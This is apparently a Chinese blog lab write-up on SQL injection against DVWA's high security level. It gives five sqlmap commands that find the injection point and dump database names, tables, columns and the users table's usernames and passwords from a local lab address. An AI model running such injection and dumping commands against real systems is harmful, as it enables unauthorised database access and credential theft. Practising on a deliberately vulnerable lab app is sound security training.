DVWA 之high级别sql注入
2024-10-05 01:27:58
Sqlmap 高级注入,抓包,然后保存数据到1.txt
1.判断注入点
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 #level是注入的等级,默认是1
2.爆数据库
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dbs
3.爆表
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --tables -D "dvwa"
4. 爆字段
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --columns -D "dvwa" -T "users"
5.爆帐号密码
sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dump -D "dvwa" -T "users" -C "user,password"
最新文章
- MVC中使用内建的HTML辅助方法产生表单元素提交表单与button按钮事件的陷阱
- Tomcat的目录结构及用途
- 动态数组 - ArrayList
- 根据之前的博文,我把给同学做的三子棋小游戏的代码发出来,只是界面很丑很丑,AI算法很笨很笨,过几天我传到网盘上,提供大家下载娱乐
- Actions 动作集
- [转载]值得推荐的C/C++框架和库
- Windows 端口和任务 查看 相关命令
- IDEA插件和快捷设置
- Esp8266
- 用JS编写一个函数,返回数组中重复出现过的元素
- jquery serializeArray()、serialize()增加数据
- WSL优化 (Windows Subsystem for Linux) Linux子系统优化配置
- 处理json大文件
- [leetcode]47. Permutations全排列(给定序列有重复元素)
- react与fetch
- (7)Pool进程池
- DOM操作之属性和样式操作
- 张高兴的 Windows 10 IoT 开发笔记:使用 MAX7219 驱动数码管
- Python 访问dict
- Android实战技巧之三十八:Handler使用中可能引发的内存泄漏